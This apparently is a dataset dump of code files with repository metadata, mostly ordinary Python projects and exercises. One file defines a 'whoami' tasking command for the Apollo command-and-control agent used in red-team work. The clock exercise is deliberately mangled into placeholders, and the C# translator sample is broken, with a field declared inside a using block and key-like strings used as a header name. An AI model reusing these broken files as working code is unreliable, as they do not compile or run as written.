blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bf893e679aad51bcabebe58e925f0b2246a3859d | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/_algorithms_challenges/exercism/python-exercises-master_with_unittest/clock/solution.py | 3735a17098d16ca49a60887846dc5085ccad67ec | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 442 | py |
c_ Clock(o..
'Clock that displays 24 hour clock that rollsover properly'
___ - , hour, minute
hour hour
minute minute
cleanup()
___ -r
r.. "%02d:%02d" % (hour, minute)
___ -e other
r.. r.. ____ __ r.. (other)
___ add minutes
minute += minutes
r.. cleanup()
___ cleanup
hour += minute // 60
hour %= 24
minute %= 60
r.. _
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
fc72438cce4f775b6b03c893d7c78269c6e4ab9d | fb23f54996ff24fb67181fa6535676a0a08ff5d1 | /bank_transactions/bank_transactions/doctype/bank_detail/bank_detail.py | be3bd80f545bee35d03bbb10cb25adffc4144db8 | [] | no_license | reddymeghraj/bank_transactions | 6b0978478f1f825fc82b46ea113f0c9093ed1b9f | 5f0370e2a253431b7d974fceac3e4db8a39fdd0a | refs/heads/master | 2020-12-24T17:26:08.946366 | 2015-06-25T04:08:15 | 2015-06-25T04:08:15 | 38,027,058 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | # Copyright (c) 2013, WayzonTech and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class BankDetail(Document):
pass
| [
"reddymeghraj@gmail.com"
] | reddymeghraj@gmail.com |
63b8ffaa5f98128433bc67366be0804a8af07ddf | ecb7156e958d10ceb57c66406fb37e59c96c7adf | /Leetcode Exercise/Leetcode387_First Unique Character in a String/mySolution.py | 92de319fd6c8607cbcd19b3a3d878af846188fb4 | [] | no_license | chenshanghao/RestartJobHunting | b53141be1cfb8713ae7f65f02428cbe51ea741db | 25e5e7be2d584faaf26242f4f6d6328f0a6dc4d4 | refs/heads/master | 2020-07-27T17:39:58.756787 | 2019-10-18T06:27:27 | 2019-10-18T06:27:27 | 209,175,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py | class Solution:
def firstUniqChar(self, s: str) -> int:
dictCharCount = dict()
for char in s:
if char in dictCharCount:
dictCharCount[char] += 1
else:
dictCharCount[char] = 1
for i in range(len(s)):
if dictCharCount[s[i]] == 1:
return i
return -1 | [
"21551021@zju.edu.cn"
] | 21551021@zju.edu.cn |
6be6b90977548954cbe0794710c83b0e94a6e2af | 626a2e5902972f926a01c58480eb8f162afc5080 | /python/sdft.py | e327c3f2c316856b2a44299ff260ea96e81a4bd5 | [] | no_license | almighty-bungholio/fpga-fft | 9ee83134c844fcd7d8d5eff4dbd52e47a0830781 | 91cf990c765ff06d71d1e2489a25842e19c73623 | refs/heads/master | 2020-04-26T20:50:56.559921 | 2018-06-14T18:36:02 | 2018-06-14T18:36:02 | 173,823,387 | 3 | 0 | null | 2019-03-04T21:21:41 | 2019-03-04T21:21:41 | null | UTF-8 | Python | false | false | 2,116 | py | from __future__ import print_function
# https://stackoverflow.com/questions/6663222/doing-fft-in-realtime
from cmath import cos, sin, pi
from scipy import signal
import numpy as np
# sample history needs to be the same as the number of frequency bins
N = 16
samp_hist = N
coeffs = []
freqs = []
in_s = []
sig_counter = 0
def init_coeffs():
for i in range(N):
a = 2.0 * pi * i / N
coeff = complex(cos(a),sin(a))
coeffs.append(coeff)
print(coeff)
def sdft(delta):
for i in range(N):
freqs[i] = (freqs[i] + delta) * coeffs[i]
# initialise
init_coeffs()
t = np.linspace(0, 1, samp_hist, endpoint=False)
sig_in = signal.square(pi * 2 * t)
#sig_in = np.sin(pi * 2 * t)
for i in range(N):
freqs.append(complex(0,0))
for i in range(samp_hist):
in_s.append(complex(0,0))
# run the loop
freq_hist = []
for i in range(samp_hist*2):
freq_hist.append(list(freqs))
# rotate in new sample
last = in_s[samp_hist-1]
for i in range(samp_hist-1, 0, -1):
in_s[i] = in_s[i-1]
in_s[0] = complex(sig_in[sig_counter % samp_hist],0)
sig_counter += 1
# run the sdft
delta = in_s[0] - last
sdft(delta)
"""
print("dumping frequency history:")
for f in range(N):
print("%2d : " % f, end='')
for i in range(32):
print("(%4.1f,%4.1f)" % (freq_hist[i][f].real, freq_hist[i][f].imag), end='')
print()
"""
# plot the results and compare with numpy's fft
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(2,2,3)
plot_freqs = []
for i in range(N):
plot_freqs.append(abs(freqs[i]))
ax.plot(range(N), plot_freqs)
ax.set_title("sliding dft")
ax = fig.add_subplot(2,2,4)
ax.plot(range(samp_hist), abs(np.fft.fft(sig_in[0:samp_hist])))
ax.set_title("numpy fft")
ax = fig.add_subplot(2,2,1)
ax.plot(range(samp_hist), sig_in[0:samp_hist])
ax.set_title("input signal")
ax = fig.add_subplot(2,2,2)
coeff_r = []
coeff_i = []
for i in range(N):
coeff_r.append( coeffs[i].real)
coeff_i.append( coeffs[i].imag)
ax.plot(coeff_r, coeff_i)
ax.set_title("coeffs/twiddles")
plt.show()
| [
"matt@mattvenn.net"
] | matt@mattvenn.net |
67c098441a88869bf3cf28d12846e54518987ed9 | 2091dc754d0346a345d84dce32177a4d6aa2097b | /Payload_Type/Apollo/mythic/agent_functions/whoami.py | 901b3cc8f3716723efcf65fe64d7d47f55f8f527 | [
"BSD-3-Clause",
"MIT"
] | permissive | dycsy/Apollo | 132d5d5f98ae2951e6c58df796be1dfbc495c03f | 6ec815cbb87379b48c12d2108e6dd669ce5ce37e | refs/heads/master | 2023-04-21T07:30:38.551661 | 2021-04-22T19:53:13 | 2021-04-22T19:53:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | from CommandBase import *
import json
class WhoamiArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {}
async def parse_arguments(self):
if len(self.command_line) > 0:
raise Exception("whoami takes no command line arguments.")
pass
class WhoamiCommand(CommandBase):
cmd = "whoami"
needs_admin = False
help_cmd = "whoami"
description = "Get the username associated with your current thread token."
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_upload_file = False
is_remove_file = False
author = "@djhohnstein"
argument_class = WhoamiArguments
attackmapping = []
async def create_tasking(self, task: MythicTask) -> MythicTask:
return task
async def process_response(self, response: AgentResponse):
pass | [
"djhohnstein@gmail.com"
] | djhohnstein@gmail.com |
9c4c9650e44bfe04e59ce5e8c8a18e4c66a162d9 | 22d91f7054c3d32c82ff9a073c5486295f814523 | /setup.py | 40f8f15f242635d636dec6818f229e7159b67ec6 | [
"MIT"
] | permissive | yrestom/erpnext_telegram | a6e2f1be971415c048fe99d07091bec5319c2e74 | d5261a14c01fd936b097eb472add56a2a5c38ac1 | refs/heads/master | 2023-02-16T13:58:04.785346 | 2023-01-20T11:27:17 | 2023-01-20T11:27:17 | 226,947,005 | 87 | 99 | NOASSERTION | 2023-02-14T07:38:14 | 2019-12-09T19:08:52 | Python | UTF-8 | Python | false | false | 596 | py | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
with open('requirements.txt') as f:
install_requires = f.read().strip().split('\n')
# get version from __version__ variable in erpnext_telegram_integration/__init__.py
from erpnext_telegram_integration import __version__ as version
setup(
name='erpnext_telegram_integration',
version=version,
description='Telegram Integration For Frappe - Erpnext',
author='Youssef Restom',
author_email='Youssef@totrox.com',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires
)
| [
"youssefrestom@gmail.com"
] | youssefrestom@gmail.com |
39e3de964b63344d0aabc82d98c460760d2bad19 | c016088a3bdb255d4f5253185d27b5a4c75feb1b | /04_working_with_list/4_12_more_loops.py | ae2a78812a14fbf60235a02cd4da69fef7ecf1e1 | [
"MIT"
] | permissive | simonhoch/python_basics | b0b7c37ff647b653bb4c16a116e5521fc6b438b6 | 4ecf12c074e641e3cdeb0a6690846eb9133f96af | refs/heads/master | 2021-04-03T10:11:10.660454 | 2018-03-13T20:04:46 | 2018-03-13T20:26:25 | 125,107,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | my_foods = ['pizza', 'falafel', 'carrotcake']
friends_foods = my_foods[:]
my_foods.append('cannoli')
friends_foods.append('ice cream')
print("My favoourite foods are :")
for food in my_foods:
print(food)
print("\nMy friend's favorite foods are :")
for food in friends_foods:
print(food)
| [
"simonhoch1@gmail.com"
] | simonhoch1@gmail.com |
20c532e6927dfd77cb291cdf4b10a9c7cf05c294 | 26ef1d2a28a438c5a0eb60d30391d4ff764702e9 | /main/migrations/0002_customusermodel_password_reseted.py | e68f4945bdd671dbfdfb3be239e0d1983dd47e7b | [] | no_license | EH-GD-MOHIT21/BirthDaywisherApi | 249c07c2133555b06d9c1465707dc051bcdae2ef | 0f9405054933b9d0d01aebb4f96fc049a7ddf7f9 | refs/heads/main | 2023-06-14T00:21:44.978716 | 2021-06-29T19:08:49 | 2021-06-29T19:08:49 | 381,467,693 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # Generated by Django 3.2.4 on 2021-06-27 16:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='customusermodel',
name='password_Reseted',
field=models.BooleanField(default=False),
),
]
| [
"experimentallyf@gmail.com"
] | experimentallyf@gmail.com |
6c6049cac56a1f2ba14af6e3e554c2e99ce3daaa | 50f63963e73a8436bef3c0e6e3be7056291e1e3b | /panda/direct/tkwidgets/WidgetPropertiesDialog.py | 0693a885d116966f0bbc201c0a8aac26eba1ff48 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | MTTPAM/installer | 7f4ad0c29631548345fac29ca7fbfcb38e37a111 | aee7a9b75f1da88fdf6d5eae5cdf24739c540438 | refs/heads/master | 2020-03-09T15:32:48.765847 | 2018-11-13T03:35:50 | 2018-11-13T03:35:50 | 128,861,764 | 1 | 4 | null | 2018-11-13T03:35:50 | 2018-04-10T02:28:29 | Python | UTF-8 | Python | false | false | 8,127 | py | """Undocumented Module"""
__all__ = ['WidgetPropertiesDialog']
from direct.showbase.TkGlobal import *
import Pmw, sys
"""
TODO:
Checkboxes for None?
Floaters to adjust float values
OK and Cancel to allow changes to be delayed
Something other than Return to accept a new value
"""
class WidgetPropertiesDialog(Toplevel):
"""Class to open dialogs to adjust widget properties."""
def __init__(self, propertyDict, propertyList = None, parent = None,
title = 'Widget Properties'):
"""Initialize a dialog.
Arguments:
propertyDict -- a dictionary of properties to be edited
parent -- a parent window (the application window)
title -- the dialog title
"""
# Record property list
self.propertyDict = propertyDict
self.propertyList = propertyList
if self.propertyList is None:
self.propertyList = list(self.propertyDict.keys())
self.propertyList.sort()
# Use default parent if none specified
if not parent:
if sys.version_info >= (3, 0):
import tkinter
parent = tkinter._default_root
else:
import Tkinter
parent = Tkinter._default_root
# Create toplevel window
Toplevel.__init__(self, parent)
self.transient(parent)
# Set title
if title:
self.title(title)
# Record parent
self.parent = parent
# Initialize modifications
self.modifiedDict = {}
# Create body
body = Frame(self)
self.initial_focus = self.body(body)
body.pack(padx=5, pady=5)
# Create OK Cancel button
self.buttonbox()
# Initialize window state
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.geometry("+%d+%d" % (parent.winfo_rootx()+50,
parent.winfo_rooty()+50))
self.initial_focus.focus_set()
self.wait_window(self)
def destroy(self):
"""Destroy the window"""
self.propertyDict = {}
self.initial_focus = None
# Clean up balloons!
for balloon in self.balloonList:
balloon.withdraw()
Toplevel.destroy(self)
#
# construction hooks
def body(self, master):
"""create dialog body.
return entry that should have initial focus.
This method should be overridden, and is called
by the __init__ method.
"""
count = 0
entryList = []
self.balloonList = []
for property in self.propertyList:
propertySet = self.propertyDict[property]
# Widget
widget = propertySet.get('widget', None)
# Get initial value
initialvalue = widget[property]
# Type of entry
entryType = propertySet.get('type', 'real')
# Is None an allowable value?
fAllowNone = propertySet.get('fNone', 0)
# Help string specified?
helpString = propertySet.get('help', None)
# Create label
label = Label(master, text=property, justify=LEFT)
label.grid(row=count, column = 0, padx=5, sticky=W)
# Create entry
entry = Pmw.EntryField(master, entry_justify = 'right')
entry.grid(row=count, column = 1, padx=5, sticky=W+E)
if initialvalue is None:
entry.insert(0, 'None')
else:
entry.insert(0, initialvalue)
# Create balloon for help
balloon = Pmw.Balloon(state = 'balloon')
self.balloonList.append(balloon)
# extra info if None is allowed value
if helpString is None:
if fAllowNone:
extra = ' or None'
else:
extra = ''
# Set up help string and validator based upon type
if entryType == 'real':
# Only allow real numbers
if fAllowNone:
entry['validate'] = { 'validator': self.realOrNone }
else:
entry['validate'] = { 'validator': 'real' }
if helpString is None:
helpString = 'Enter a floating point number' + extra + '.'
elif entryType == 'integer':
# Only allow integer values
if fAllowNone:
entry['validate'] = { 'validator': self.intOrNone }
else:
entry['validate'] = { 'validator': 'integer' }
if helpString is None:
helpString = 'Enter an integer' + extra + '.'
else:
# Anything goes with a string widget
if helpString is None:
helpString = 'Enter a string' + extra + '.'
# Bind balloon with help string to entry
balloon.bind(entry, helpString)
# Create callback to execute whenever a value is changed
modifiedCallback = (lambda f=self.modified, w=widget, e=entry,
p=property, t=entryType, fn=fAllowNone:
f(w, e, p, t, fn))
entry['modifiedcommand'] = modifiedCallback
# Keep track of the entrys
entryList.append(entry)
count += 1
# Set initial focus
if len(entryList) > 0:
entry = entryList[0]
entry.select_range(0, END)
# Set initial focus to first entry in the list
return entryList[0]
else:
# Just set initial focus to self
return self
def modified(self, widget, entry, property, type, fNone):
self.modifiedDict[property] = (widget, entry, type, fNone)
def buttonbox(self):
"""add standard button box buttons.
"""
box = Frame(self)
# Create buttons
w = Button(box, text="OK", width=10, command=self.ok)
w.pack(side=LEFT, padx=5, pady=5)
# Create buttons
w = Button(box, text="Cancel", width=10, command=self.cancel)
w.pack(side=LEFT, padx=5, pady=5)
# Bind commands
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.cancel)
# Pack
box.pack()
def realOrNone(self, val):
val = val.lower()
if 'none'.find(val) != -1:
if val == 'none':
return Pmw.OK
else:
return Pmw.PARTIAL
return Pmw.realvalidator(val)
def intOrNone(self, val):
val = val.lower()
if 'none'.find(val) != -1:
if val == 'none':
return Pmw.OK
else:
return Pmw.PARTIAL
return Pmw.integervalidator(val)
#
# standard button semantics
def ok(self, event=None):
self.withdraw()
self.update_idletasks()
self.validateChanges()
self.apply()
self.cancel()
def cancel(self, event=None):
# put focus back to the parent window
self.parent.focus_set()
self.destroy()
def validateChanges(self):
for property in self.modifiedDict:
tuple = self.modifiedDict[property]
widget = tuple[0]
entry = tuple[1]
type = tuple[2]
fNone = tuple[3]
value = entry.get()
lValue = value.lower()
if 'none'.find(lValue) != -1:
if fNone and (lValue == 'none'):
widget[property] = None
else:
if type == 'real':
value = float(value)
elif type == 'integer':
value = int(value)
widget[property] = value
def apply(self):
"""process the data
This method is called automatically to process the data, *after*
the dialog is destroyed. By default, it does nothing.
"""
pass # override
| [
"linktlh@gmail.com"
] | linktlh@gmail.com |
432c9801db53735f2bdfd2a7ff3571bcc8a4e49a | ea21f4dee4a3af5882725fa2a5b8c0aaf755cdf6 | /gsheets/tools.py | 739aa35691df0710d6523bc1e6a24c05c29e4f8d | [
"GPL-1.0-or-later",
"MIT"
] | permissive | nkrishnaswami/gsheets | a903077654b89559f69b139e2cd66bf235191c65 | cefbb8e4f34d1f30d768d4f1d7ee38d7e92aaa11 | refs/heads/master | 2023-04-22T20:01:07.357509 | 2020-07-06T14:26:11 | 2020-07-06T14:26:11 | 275,808,436 | 0 | 0 | MIT | 2021-04-30T21:35:39 | 2020-06-29T12:28:46 | Python | UTF-8 | Python | false | false | 3,206 | py | # tools.py - generic helpers
import collections
__all__ = [
'lazyproperty', 'doctemplate', 'list_view', 'eval_source', 'uniqued',
]
class lazyproperty(object): # noqa: N801
"""Non-data descriptor caching the computed result as instance attribute.
>>> class Spam(object):
... @lazyproperty
... def eggs(self):
... return 'spamspamspam'
>>> spam=Spam(); spam.eggs
'spamspamspam'
>>> spam.eggs='eggseggseggs'; spam.eggs
'eggseggseggs'
>>> Spam().eggs
'spamspamspam'
>>> Spam.eggs # doctest: +ELLIPSIS
<...lazyproperty object at 0x...>
"""
def __init__(self, fget):
self.fget = fget
for attr in ('__module__', '__name__', '__doc__'):
setattr(self, attr, getattr(fget, attr))
def __get__(self, instance, owner):
if instance is None:
return self
result = instance.__dict__[self.__name__] = self.fget(instance)
return result
def doctemplate(*args):
"""Return a decorator putting ``args`` into the docstring of the decorated ``func``.
>>> @doctemplate('spam', 'spam')
... def spam():
... '''Returns %s, lovely %s.'''
... return 'Spam'
>>> spam.__doc__
'Returns spam, lovely spam.'
"""
def decorator(func):
func.__doc__ = func.__doc__ % tuple(args)
return func
return decorator
class list_view(object): # noqa: N801
"""Readonly view on a list or sequence.
>>> list_view(['spam'])
['spam']
"""
def __init__(self, items):
self._items = items
def __repr__(self):
return repr(self._items)
def __len__(self):
"""Return the list size.
>>> len(list_view(['spam']))
1
"""
return len(self._items)
def __iter__(self):
"""Yield list items.
>>> list(list_view(['spam']))
['spam']
"""
return iter(self._items)
def __contains__(self, item):
"""List member check.
>>> 'spam' in list_view(['spam'])
True
"""
return item in self._items
def __getitem__(self, index):
"""Member/slice retrieval.
>>> list_view(['spam'])[0]
'spam'
"""
return self._items[index]
def group_dict(items, keyfunc):
"""Return a list defaultdict with ``items`` grouped by ``keyfunc``.
>>> sorted(group_dict('eggs', lambda x: x).items())
[('e', ['e']), ('g', ['g', 'g']), ('s', ['s'])]
"""
result = collections.defaultdict(list)
for i in items:
key = keyfunc(i)
result[key].append(i)
return result
def eval_source(source):
"""Return ``eval(source)`` with ``source`` attached as attribute.
>>> eval_source("lambda: 'spam'")()
'spam'
>>> eval_source("lambda: 'spam'").source
"lambda: 'spam'"
"""
result = eval(source)
result.source = source
return result
def uniqued(iterable):
"""Return unique list of ``iterable`` items preserving order.
>>> uniqued('spameggs')
['s', 'p', 'a', 'm', 'e', 'g']
"""
seen = set()
return [item for item in iterable if item not in seen and not seen.add(item)]
| [
"sebastian.bank@uni-leipzig.de"
] | sebastian.bank@uni-leipzig.de |
57d92fa9e354a050c91008bbcf14dbed05ceae23 | f937b8dce0467b13b45e46dae948effce2ef5295 | /network/v2_0/vpn/test_service_integration.py | 12347934c0eb38ace4f46c3eb997751ca682f3f8 | [] | no_license | TerryHowe/oscaft | 946410743635c642bc55dbc43503d438e9ddd926 | d4bce05488e02c9cba989f48fe7d2a5a5aaf723d | refs/heads/master | 2021-01-10T21:45:19.794301 | 2014-03-05T16:36:42 | 2014-03-05T16:36:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,823 | py | # Copyright 2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import httpretty
from openstackclient.network.v2_0.vpn import service
from openstackclient.tests.oscaft import common
class TestServiceIntegration(common.TestIntegrationBase):
HOSTESS = common.TestIntegrationBase.HOST + common.TestIntegrationBase.VER
SUBNETS_URL = HOSTESS + "/subnets.json"
SUBNETS_ONE = '{ "subnets": [{ "id": "12312311" }]}'
ROUTERS_URL = HOSTESS + "/routers.json"
ROUTERS_ONE = '{ "routers": [{ "id": "33333333" }]}'
CREATE_URL = HOSTESS + "/vpn/vpnservices.json"
CREATE = """
{
"vpnservice":
{
"status": "ACTIVE",
"name": "nameo",
"tenant_id": "33a40233",
"id": "a9254bdb"
}
}"""
DELETE_URL = HOSTESS + "/vpn/vpnservices/a9254bdb.json"
DELETE = "{}"
LIST_URL = HOSTESS + "/vpn/vpnservices.json"
LIST_ONE = """
{
"vpnservices": [{
"id": "a9254bdb"
}]
}"""
LIST = """
{
"vpnservices": [
{
"status": "ACTIVE",
"name": "nameo",
"tenant_id": "33a40233",
"id": "a9254bdb"
},
{
"status": "ACTIVE",
"name": "croc",
"tenant_id": "33a40233",
"id": "b8408dgd"
}
]
}"""
SET_URL = HOSTESS + "/vpn/vpnservices/a9254bdb.json"
SET = "{}"
SHOW_URL = HOSTESS + "/vpn/vpnservices/a9254bdb.json"
SHOW = CREATE
@httpretty.activate
def test_create(self):
pargs = common.FakeParsedArgs()
pargs.name = 'nameo'
pargs.subnet = 'subby'
pargs.router = 'rooty'
pargs.admin_state = True
pargs.tenant_id = '33a40233'
httpretty.register_uri(httpretty.GET, self.SUBNETS_URL,
body=self.SUBNETS_ONE)
httpretty.register_uri(httpretty.GET, self.ROUTERS_URL,
body=self.ROUTERS_ONE)
httpretty.register_uri(httpretty.POST, self.CREATE_URL,
body=self.CREATE)
self.when_run(service.CreateService, pargs)
self.assertEqual('', self.stderr())
self.assertEqual(u"""\
Created a new vpnservice:
id="a9254bdb"
name="nameo"
status="ACTIVE"
tenant_id="33a40233"
""", self.stdout())
@httpretty.activate
def test_delete(self):
pargs = common.FakeParsedArgs()
pargs.identifier = 'nameo'
httpretty.register_uri(httpretty.GET, self.LIST_URL,
body=self.LIST_ONE)
httpretty.register_uri(httpretty.DELETE, self.DELETE_URL,
body=self.DELETE)
self.when_run(service.DeleteService, pargs)
self.assertEqual('', self.stderr())
self.assertEqual(u'Deleted vpnservice: nameo\n',
self.stdout())
@httpretty.activate
def test_list(self):
pargs = common.FakeParsedArgs()
pargs.formatter = 'csv'
httpretty.register_uri(httpretty.GET, self.LIST_URL,
body=self.LIST)
self.when_run(service.ListService, pargs)
self.assertEqual('', self.stderr())
self.assertEqual("""\
id,name,status
a9254bdb,nameo,ACTIVE
b8408dgd,croc,ACTIVE
""", self.stdout())
@httpretty.activate
def test_set(self):
pargs = common.FakeParsedArgs()
pargs.identifier = 'nameo'
httpretty.register_uri(httpretty.GET, self.LIST_URL,
body=self.LIST_ONE)
httpretty.register_uri(httpretty.PUT, self.SET_URL,
body=self.SET)
self.when_run(service.SetService, pargs)
self.assertEqual('', self.stderr())
self.assertEqual('Updated vpnservice: nameo\n', self.stdout())
@httpretty.activate
def test_show(self):
pargs = common.FakeParsedArgs()
pargs.identifier = 'nameo'
httpretty.register_uri(httpretty.GET, self.LIST_URL,
body=self.LIST_ONE)
httpretty.register_uri(httpretty.GET, self.SHOW_URL,
body=self.SHOW)
self.when_run(service.ShowService, pargs)
self.assertEqual('', self.stderr())
self.assertEqual(u"""\
id="a9254bdb"
name="nameo"
status="ACTIVE"
tenant_id="33a40233"
""", self.stdout())
| [
"terrylhowe@gmail.com"
] | terrylhowe@gmail.com |
fba8f796a41c43d442b43240179a28ee8763ed64 | a574d0c0ebc8e17eb641777f93544c0ae43850c9 | /part_3/4.5.4_modify_dict.py | c2dbfc9fab278145af88ff9543c5680ec080a8c7 | [] | no_license | broepke/GTx | 1e33c97d0f86e95124ceb5f0436f965154822466 | e12143c9b1fc93d4489eb0f6c093637503139bf6 | refs/heads/master | 2020-04-08T09:35:41.884572 | 2020-01-03T03:37:34 | 2020-01-03T03:37:34 | 159,230,824 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | # Write a function called modify_dict. modify_dict takes one
# parameter, a dictionary. The dictionary's keys are people's
# last names, and the dictionary's values are people's first
# names. For example, the key "Joyner" would have the value
# "David".
#
# modify_dict should delete any key-value pair for which the
# key's first letter is not capitalized. For example, the
# key-value pair "joyner":"David" would be deleted, but the
# key-value pair "Joyner":"david" would not be deleted. Then,
# return the modified dictionary.
#
# Remember, the keyword del deletes items from lists and
# dictionaries. For example, to remove the key "key!" from
# the dictionary my_dict, you would write: del my_dict["key!"]
# Or, if the key was the variable my_key, you would write:
# del my_dict[my_key]
#
# Hint: If you try to delete items from the dictionary while
# looping through the dictionary, you'll run into problems!
# We should never change the number if items in a list or
# dictionary while looping through those items. Think about
# what you could do to keep track of which keys should be
# deleted so you can delete them after the loop is done.
#
# Hint 2: To check if the first letter of a string is a
# capital letter, use string[0].isupper().
# Write your function here!
def modify_dict(a_dict):
to_delete = []
for last_names in a_dict.keys():
if not last_names[0].isupper():
to_delete.append(last_names)
for names in to_delete:
del a_dict[names]
return a_dict
# Below are some lines of code that will test your function.
# You can change the value of the variable(s) to test your
# function with different inputs.
#
# If your function works correctly, this will originally
# print (although the order of the keys may vary):
# {'Diaddigo':'Joshua', 'Elliott':'jackie'}
my_dict = {'Joshua': 'Diaddigo', 'joyner': 'David', 'Elliott': 'jackie', 'murrell': 'marguerite'}
print(modify_dict(my_dict))
| [
"broepke@gmail.com"
] | broepke@gmail.com |
eda246aacebf6179f8d8da7e6cd5e0d64c2be0b3 | 2bdedcda705f6dcf45a1e9a090377f892bcb58bb | /src/main/output/month_air/city/woman/world.py | f97a907eecbf688cc6b2b1a09bc9bbfce64f5dff | [] | no_license | matkosoric/GenericNameTesting | 860a22af1098dda9ea9e24a1fc681bb728aa2d69 | 03f4a38229c28bc6d83258e5a84fce4b189d5f00 | refs/heads/master | 2021-01-08T22:35:20.022350 | 2020-02-21T11:28:21 | 2020-02-21T11:28:21 | 242,123,053 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,939 | py | using System;
using System.Net.Http;
using System.Text;
using System.Threading.Tasks;
// Install Newtonsoft.Json with NuGet
using Newtonsoft.Json;
namespace translate_sample
{
class Program
{
private const string key_var = "TRANSLATOR_TEXT_SUBSCRIPTION_KEY";
private const string endpoint_var = "TRANSLATOR_TEXT_ENDPOINT";
private static readonly string endpoint = Environment.GetEnvironmentVariable(endpoint_var);
static Program()
{
if (null == subscriptionKey)
{
throw new Exception("Please set/export the environment variable: " + key_var);
}
if (null == endpoint)
{
throw new Exception("Please set/export the environment variable: " + endpoint_var);
}
}
// The code in the next section goes here.
// This sample requires C# 7.1 or later for async/await.
// Async call to the Translator Text API
static public async Task TranslateTextRequest(string subscriptionKey, string endpoint, string route, string inputText)
{
object[] body = new object[] { new { Text = inputText } };
var requestBody = JsonConvert.SerializeObject(body);
using (var client = new HttpClient())
using (var request = new HttpRequestMessage())
private static readonly string subscriptionKey = "93f365052c9e0562bfbb7a88aaa9513e";
{
// Build the request.
// Set the method to Post.
request.Method = HttpMethod.Post;
// Construct the URI and add headers.
request.RequestUri = new Uri(endpoint + route);
request.Content = new StringContent(requestBody, Encoding.UTF8, "application/json");
request.Headers.Add("75fd5c14e7ae7e91692980371ca8be51", subscriptionKey);
// Send the request and get response.
HttpResponseMessage response = await client.SendAsync(request).ConfigureAwait(false);
// Read response as a string.
string result = await response.Content.ReadAsStringAsync();
// Deserialize the response using the classes created earlier.
TranslationResult[] deserializedOutput = JsonConvert.DeserializeObject<TranslationResult[]>(result);
// Iterate over the deserialized results.
foreach (TranslationResult o in deserializedOutput)
{
// Print the detected input language and confidence score.
Console.WriteLine("Detected input language: {0}\nConfidence score: {1}\n", o.DetectedLanguage.Language, o.DetectedLanguage.Score);
// Iterate over the results and print each translation.
foreach (Translation t in o.Translations)
{
Console.WriteLine("Translated to {0}: {1}", t.To, t.Text);
}
}
}
}
static async Task Main(string[] args)
{
// This is our main function.
// Output languages are defined in the route.
// For a complete list of options, see API reference.
// https://docs.microsoft.com/azure/cognitive-services/translator/reference/v3-0-translate
string route = "/translate?api-version=3.0&to=de&to=it&to=ja&to=th";
// Prompts you for text to translate. If you'd prefer, you can
// provide a string as textToTranslate.
Console.Write("Type the phrase you'd like to translate? ");
string textToTranslate = Console.ReadLine();
await TranslateTextRequest(subscriptionKey, endpoint, route, textToTranslate);
Console.WriteLine("Press any key to continue.");
Console.ReadKey();
}
}
}
| [
"soric.matko@gmail.com"
] | soric.matko@gmail.com |
